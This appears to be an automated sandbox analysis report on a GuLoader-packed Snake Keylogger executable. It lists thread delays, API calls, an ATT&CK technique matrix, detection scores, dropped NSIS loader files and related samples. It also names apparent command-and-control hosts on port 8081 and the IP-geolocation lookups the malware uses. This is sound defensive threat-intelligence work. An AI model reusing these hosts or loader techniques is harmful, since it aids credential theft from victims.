Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 599636	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 599470	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 599213	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 599070	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 596544	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 596240	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595989	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595421	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594422	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594080	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 593953	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 593843	Jump to behavior

Source: BtCQu5APhK.exe, 00000008.00000002.2130156922.00000000079C8000.00000004.00000020.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2130156922.0000000007A1F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	API call chain: ExitProcess graph end node			graph_0-4511
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	API call chain: ExitProcess graph end node			graph_0-4516

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Process created: C:\Users\user\Desktop\BtCQu5APhK.exe "C:\Users\user\Desktop\BtCQu5APhK.exe"

Jump to behavior

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Queries volume information: C:\Users\user\Desktop\BtCQu5APhK.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405F0A

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000008.00000002.2149177368.0000000037F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000008.00000002.2149177368.0000000037F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 Registry Run Keys / Startup Folder	11 Process Injection	11 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	214 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
BtCQu5APhK.exe	76%	Virustotal		Browse
BtCQu5APhK.exe	66%	ReversingLabs	Win32.Trojan.Guloader
BtCQu5APhK.exe	100%	Avira	TR/AD.NsisInject.dsenc

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsg9317.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsg9317.tmp\System.dll	0%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.184.206	true	false	high
drive.usercontent.google.com	172.217.16.193	true	false	high
reallyfreegeoip.org	104.21.80.1	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://aborters.duckdns.org:8081	BtCQu5APhK.exe, 00000008.00000002.2149177368.0000000037F71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/	BtCQu5APhK.exe, 00000008.00000002.2130156922.00000000079C8000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	BtCQu5APhK.exe, 00000008.00000002.2149177368.0000000037F71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003806E000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.00000000380CC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	BtCQu5APhK.exe, 00000008.00000002.2149177368.0000000038047000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.00000000380CC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003806E000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.00000000380CC000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003802B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	BtCQu5APhK.exe, 00000008.00000003.1978525498.0000000007A29000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003806E000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.00000000380CC000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003801F000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003802B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/=	BtCQu5APhK.exe, 00000008.00000003.1978525498.0000000007A29000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	BtCQu5APhK.exe, 00000008.00000002.2149177368.00000000380CC000.00000004.00000800.00020000.00000000.sdmp, BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003802B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	BtCQu5APhK.exe, 00000000.00000002.1679502850.0000000000409000.00000004.00000001.01000000.00000003.sdmp, BtCQu5APhK.exe, 00000000.00000000.865676042.0000000000409000.00000008.00000001.01000000.00000003.sdmp, BtCQu5APhK.exe, 00000008.00000000.1673920858.0000000000409000.00000008.00000001.01000000.00000003.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	BtCQu5APhK.exe, 00000008.00000002.2149177368.0000000037F71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	BtCQu5APhK.exe, 00000008.00000002.2149177368.0000000037F71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	BtCQu5APhK.exe, 00000008.00000002.2149177368.000000003802B000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
142.250.184.206	drive.google.com	United States	15169	GOOGLEUS	false
172.217.16.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
104.21.80.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1632373
Start date and time:	2025-03-07 22:58:29 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BtCQu5APhK.exe renamed because original name is a hash value
Original Sample Name:	225c26cf877ca85f63e80f878609f6dd2cf2ce717d4885f88a7a442d8bee03ad.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/30@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 94% Number of executed functions: 98 Number of non-executed functions: 79
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
Execution Graph export aborted for target BtCQu5APhK.exe, PID 2760 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
17:01:17	API Interceptor	76x Sleep call for process: BtCQu5APhK.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.122.6.168	lvrHOgPXr5.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	3GrfjMY0pG.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Shipment advice H-BL Draft.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	OeM750ajqm.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	jVE64QGXtK.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	mKRflLn5sx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	HBL NO C-ACC-250002.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Shipping Document ..exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PROFORMA INVOICE.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
104.21.80.1	DHL AWB Receipt_pdf.bat.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/2dxw/
	Marzec 2025-faktura.pdf.exe	Get hash	malicious	FormBook	Browse	www.oldpay.online/u023/?lneDc=2js00DxFGjY6gHlVOW1q9a10L3HzPIs7WpRmaT2A/LnakQk0VzYAjcxSKMUcEwKHsPPKaiHoQA==&NvExnX=FrapFFYPB
	z1companyProfileandproducts.exe	Get hash	malicious	FormBook	Browse	www.dd87558.vip/uoki/
	http://7a.ithuupvudv.ru	Get hash	malicious	Unknown	Browse	7a.ithuupvudv.ru/favicon.ico
	PRI_VTK250419A.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/scc1/five/fre.php
	dfiCWCanbj.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	laser (2).ps1	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	laser.ps1	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	QUOTATION REQUEST.exe	Get hash	malicious	FormBook	Browse	www.shlomi.app/t3l4/
	Quotation.exe	Get hash	malicious	FormBook	Browse	www.askvtwv8.top/uztg/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	lvrHOgPXr5.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	s6R3Xjt79e.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.247.73
	GuuQOl5kJR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	hUMdKouQ1H.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	1258ad6Jpw.exe	Get hash	malicious	GuLoader	Browse	158.101.44.242
	iFoDComHqT.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.130.0
	cqWZtEH4eJ.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	axN56TZ3PI.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	bvhauD4o49.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	0CBJ3aLKx0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
reallyfreegeoip.org	lvrHOgPXr5.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	s6R3Xjt79e.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.64.1
	GuuQOl5kJR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.64.1
	hUMdKouQ1H.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.48.1
	1258ad6Jpw.exe	Get hash	malicious	GuLoader	Browse	104.21.16.1
	iFoDComHqT.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	cqWZtEH4eJ.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.16.1
	axN56TZ3PI.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.64.1
	bvhauD4o49.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.32.1
	0CBJ3aLKx0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	lvrHOgPXr5.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	hUMdKouQ1H.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	1258ad6Jpw.exe	Get hash	malicious	GuLoader	Browse	158.101.44.242
	iFoDComHqT.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.130.0
	bvhauD4o49.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	0CBJ3aLKx0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	26YzPy68Rz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	O20L0ptxGs.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	DayVXJx1km.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
CLOUDFLARENETUS	jki-dragon-release-online-setup.exe	Get hash	malicious	Unknown	Browse	104.17.118.104
	lvrHOgPXr5.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	s6R3Xjt79e.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.64.1
	GuuQOl5kJR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.64.1
	hUMdKouQ1H.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.48.1
	ZWyrFp7WBM.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	xnlP06YunJ.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	jki-dragon-release-online-setup.exe	Get hash	malicious	Unknown	Browse	104.17.118.104
	1258ad6Jpw.exe	Get hash	malicious	GuLoader	Browse	104.21.16.1
	kbdXtadZsM.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	lvrHOgPXr5.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.80.1
	s6R3Xjt79e.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.80.1
	GuuQOl5kJR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	hUMdKouQ1H.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	2Jq4fZJIJ8.exe	Get hash	malicious	GuLoader	Browse	104.21.80.1
	1258ad6Jpw.exe	Get hash	malicious	GuLoader	Browse	104.21.80.1
	iFoDComHqT.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.80.1
	cqWZtEH4eJ.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	axN56TZ3PI.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	bvhauD4o49.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
37f463bf4616ecd445d4a1937da06e19	GuuQOl5kJR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.184.206 172.217.16.193
	hUMdKouQ1H.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.184.206 172.217.16.193
	2Jq4fZJIJ8.exe	Get hash	malicious	GuLoader	Browse	142.250.184.206 172.217.16.193
	GyGE2VaBFL.exe	Get hash	malicious	GuLoader	Browse	142.250.184.206 172.217.16.193
	1258ad6Jpw.exe	Get hash	malicious	GuLoader	Browse	142.250.184.206 172.217.16.193
	ZUY4Nq2SyY.exe	Get hash	malicious	GuLoader	Browse	142.250.184.206 172.217.16.193
	cqWZtEH4eJ.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.184.206 172.217.16.193
	axN56TZ3PI.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.184.206 172.217.16.193
	sR4s2qQF6I.exe	Get hash	malicious	GuLoader	Browse	142.250.184.206 172.217.16.193
	VnaQJI0ScP.exe	Get hash	malicious	GuLoader	Browse	142.250.184.206 172.217.16.193

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsg9317.tmp\System.dll	GuuQOl5kJR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Steel Sample- QUOTE.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Steel Sample- QUOTE.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Skambenets.exe	Get hash	malicious	GuLoader	Browse
	Skambenets.exe	Get hash	malicious	GuLoader	Browse
	Marcom Trade SS-04665.exe	Get hash	malicious	Remcos, GuLoader	Browse
	Hermaean.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	SecuriteInfo.com.FileRepMalware.23885.29286.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	SecuriteInfo.com.FileRepMalware.24375.4894.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	OqqrLiFWKC.exe	Get hash	malicious	Mindspark	Browse

Created / dropped Files

C:\Users\Public\Desktop\Varda.ini

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	33
Entropy (8bit):	4.33197669498491
Encrypted:	false
SSDEEP:	3:U4ooQGRDWh:hooQh
MD5:	340AD700CF73B73EA2313C044D40EA9A
SHA1:	9B90CC3147D140FA936E308C2C320BDC385DA93A
SHA-256:	55A2B8F5EF1D17023FD8245E69830CC961C0CE629EDDC7AC1043C288CB3915B5
SHA-512:	4B31D10B80AE71197AC367C868569949224A4CD542BF0E9C188B816348EC8958F952525F939C827BDDC8610F268DD12E310D6D2FC99071C741B3A38E062542B4
Malicious:	false
Reputation:	low
Preview:	[Chocho240]..struct=finkulturel..

C:\Users\user\AppData\Local\Temp\Alpha.ini

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.628848957968553
Encrypted:	false
SSDEEP:	3:YOm45GXQLQIfLBJXmgxv:5TGXQkIP2I
MD5:	B895D576D6637A778B387B2FCA0F56EC
SHA1:	E78D2BE4D94673D612C16D29C330BB0C78778429
SHA-256:	BFEC1E97ED5D34825521D60B98986D1564CD159B4D1F9569EAE4C3464D2F5C47
SHA-512:	B4A771D1B517A2776BA440F79F168306C244DF1A6DE1966313157154D8D52BEAD8131B95F846C2F55C15382E04284FFFC6CF6ABF3F6FCFCB259DF2EA58D769E5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Current]..Ini=user32::EnumWindows(i r1 ,i 0)..

C:\Users\user\AppData\Local\Temp\nsc7BB5.tmp

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	data
Category:	dropped
Size (bytes):	2168953
Entropy (8bit):	5.527460080693035
Encrypted:	false
SSDEEP:	49152:m53wBV6bRPEd1UObFu0mBFmvYFe0m40mD0mbXCP:ewgRKbwRrgoTU
MD5:	91BC96A65AB1300C21CF6C0023657621
SHA1:	9E8294A9A29F907CA9B5684B5771D8575C128EDC
SHA-256:	46FFABB04FA940662609C2B73B7023AD190041FDE9B99102968AD50DB7A49AF7
SHA-512:	2CBACFCDEAC69754302F247088ABF9CFB466AA6A52468E4E591DF2E5A64CE4DBDFA61600C80218455230687D96363138846EE4CF9A975DA57B6C92F6C6891A53
Malicious:	false
Reputation:	low
Preview:	.,......,................................+.......,..........................................................................................................................................................................................................................................G...Y...........~...j...............................................................................................................................g...............................................................................#...:...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsf90F3.tmp

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	74
Entropy (8bit):	3.9637832956585757
Encrypted:	false
SSDEEP:	3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
MD5:	16D513397F3C1F8334E8F3E4FC49828F
SHA1:	4EE15AFCA81CA6A13AF4E38240099B730D6931F0
SHA-256:	D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
SHA-512:	4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5

C:\Users\user\AppData\Local\Temp\nsg9317.tmp\System.dll

Download File

